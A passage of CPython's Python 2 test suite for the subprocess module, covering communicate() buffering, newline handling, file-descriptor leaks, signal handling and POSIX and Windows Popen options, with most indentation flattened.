# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
# NB. replaced SETBINARY with the -u flag
p = subprocess.Popen([sys.executable, "-u", "-c",
'import sys,os;' + #SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# Same as test_universal_newlines, but reading through communicate()
# instead of p.stdout.read() directly.
# universal newlines through communicate()
# NB. replaced SETBINARY with the -u flag
p = subprocess.Popen([sys.executable, "-u", "-c",
'import sys,os;' + #SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
# NOTE: `file` is the Python 2 builtin; probes universal-newline support.
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
# Strategy: exhaust the fd limit on purpose, free a few fds, then spawn
# subprocesses repeatedly; any fd leaked per-spawn makes a later
# iteration hit EMFILE and fail.
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
# The loop never hit EMFILE: the platform limit is higher than
# max_handles, so the test cannot prove anything -- skip.
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
    """poll() returns None while the child runs, then its exit status."""
    proc = subprocess.Popen([sys.executable,
                             "-c", "import time; time.sleep(1)"])
    polls = 0
    while proc.poll() is None:
        time.sleep(0.1)
        polls += 1
    # We expect that the poll loop probably went around about 10 times,
    # but, based on system scheduling we can't control, it's possible
    # poll() never returned None. It "should be" very rare that it
    # didn't go around at least twice.
    self.assertGreaterEqual(polls, 2)
    # Subsequent invocations should just return the returncode
    self.assertEqual(proc.poll(), 0)
def test_wait(self):
    """wait() returns the exit status and is safe to call repeatedly."""
    proc = subprocess.Popen([sys.executable,
                             "-c", "import time; time.sleep(2)"])
    self.assertEqual(proc.wait(), 0)
    # A second wait() just replays the cached returncode.
    self.assertEqual(proc.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
# A background thread keeps creating pipe fds while Popen fails, so a
# double-close in Popen's error path would close one of *these* fds by
# fd-number reuse; os.close() below then detects the damage.
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
# NOTE(review): cleanup only runs in the except branch; if Popen("*")
# unexpectedly succeeded, the three temp files would never be closed or
# removed and the assertions below would fail -- confirm this is the
# intended failure mode.
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
# The child exits immediately without reading stdin, so writing 1 MiB
# to it triggers EPIPE, which communicate() must swallow.
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
# Same as test_communicate_epipe but with only stdin piped; the sleep
# lets the child exit first so the write is guaranteed to hit EPIPE.
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
# PopenTestException / PopenExecuteChildRaises are helper classes
# defined elsewhere in this test module.
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
# Saved RLIMIT_CORE pair; stays None if we could not change the limit.
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
# Python 2 print statement (this module targets Python 2).
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
# Nothing to restore if __enter__ never managed to change the limit.
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
# NOTE(review): uses Popen as a context manager, which stock
# Python 2.7 subprocess does not support -- presumably a backport
# or helper elsewhere in this module provides it; verify.
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
# Tests of POSIX-only Popen behavior (signals, fds, shells, preexec_fn).
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
# A negative returncode means "killed by that signal number".
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
# os.putenv in the preexec_fn runs in the forked child just before
# exec, so only the child's environment gains FRUIT.
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
# NOTE: the _execute_child signature below matches Python 2.7's private
# Popen._execute_child and will break if that internal API changes.
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
# (If they were, _execute_child double-closed an fd and the
# number got recycled.)
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
# The raising preexec_fn forces _execute_child down its errpipe_data
# error path; _TestExecuteChildPopen then checks no fd was recycled.
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
# Build a tiny executable shell script and pass its path (a string,
# not a list) straight to Popen.
f, fname = mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
# With shell=1 the first list element is handed to /bin/sh, so the
# $FRUIT expansion happens in the shell using the supplied env.
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
# Same as above, but the command is given as a plain string.
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
    # call() function with string argument on UNIX.
    # Build a tiny executable shell script, then invoke it via call()
    # with a plain string argument.
    f, fname = mkstemp()
    try:
        os.write(f, "#!/bin/sh\n")
        os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
                 sys.executable)
        os.close(f)
        # 0o700 (owner rwx) -- the old "0700" spelling is a Python 2-only
        # octal literal and a syntax error on Python 3; 0o700 is accepted
        # by Python 2.6+ and 3.x alike, matching test_args_string above.
        os.chmod(fname, 0o700)
        rc = subprocess.call(fname)
    finally:
        # Remove the script even if call() raised, so a failure here
        # does not leave temp files behind.
        os.remove(fname)
    self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
# Each shell echoes $0, which must equal the executable= path we gave.
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Helper: start a long-sleeping child, apply the given Popen method
# (kill/terminate/send_signal) to it and return the Popen object.
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Helper: ensure signalling an already-exited child does not raise.
# NOTE(review): skipIf on a non-test helper works because calling the
# wrapped helper raises SkipTest, which propagates to the calling test.
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
# Live-process signalling: each test drives _kill_process and checks the
# child's stderr and exit status.
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
# SIGINT surfaces in the child as KeyboardInterrupt.
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
# Dead-process signalling: must not raise (see _kill_dead_process).
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
# Duplicate the fds first so they can be restored in the finally block;
# the dup of fd 0 also serves as the child's stdin.
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
# Restore the original std fds from the saved duplicates.
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
# Every combination of closed standard fds, driven via check_close_std_fds.
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# Remap the three std streams onto unlinked temp files in an arbitrary
# order and check that the child still reads/writes the right ones.
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
# Put the real std fds back before asserting, so unittest's own
# output machinery works even on failure.
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
# The helper script ignores SIGCHLD; wait() must still succeed.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
# Record identity before dropping the only reference; gc_collect forces
# __del__ to run even on non-refcounting implementations.
ident = id(p)
pid = p.pid
del p
test_support.gc_collect()
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
test_support.gc_collect()
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
# p1 blocks on a read so its pipes stay open while p2 starts.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# p2 tries to close p1's pipe fds; each close must fail with EBADF,
# proving the fds were not inherited despite close_fds=False.
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
# Tests of Windows-only Popen behavior (STARTUPINFO, creationflags, shell).
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
# CREATE_NEW_CONSOLE makes the child pop up its own console window.
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
    """POSIX-only Popen arguments must raise ValueError on Windows."""
    cmd = [sys.executable, "-c", "import sys; sys.exit(47)"]
    # preexec_fn has no Windows equivalent.
    self.assertRaises(ValueError, subprocess.call, cmd,
                      preexec_fn=lambda: 1)
    # close_fds cannot be combined with redirected std handles here.
    self.assertRaises(ValueError, subprocess.call, cmd,
                      stdout=subprocess.PIPE,
                      close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
# "set" is a cmd.exe builtin that dumps the environment; the injected
# FRUIT variable must appear in its output.
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
# Same check with the command given as a plain string.
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
    """call() accepts a plain command-line string on Windows."""
    cmdline = sys.executable + ' -c "import sys; sys.exit(47)"'
    self.assertEqual(subprocess.call(cmdline), 47)
def _kill_process(self, method, *args):
# Helper: start a long-sleeping child, apply the given Popen method
# (kill/terminate/send_signal) and assert it died with a non-zero code.
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
# Helper: signalling an already-exited child must not raise, and the
# child's own exit code (42) must be preserved.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
# Thin wrappers driving the two helpers above; on Windows only SIGTERM
# (and CTRL_* events) are meaningful signals.
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
                     "poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the whole ProcessTestCase suite with the poll() code path
    disabled, forcing subprocess to use its select()-based fallback."""

    def setUp(self):
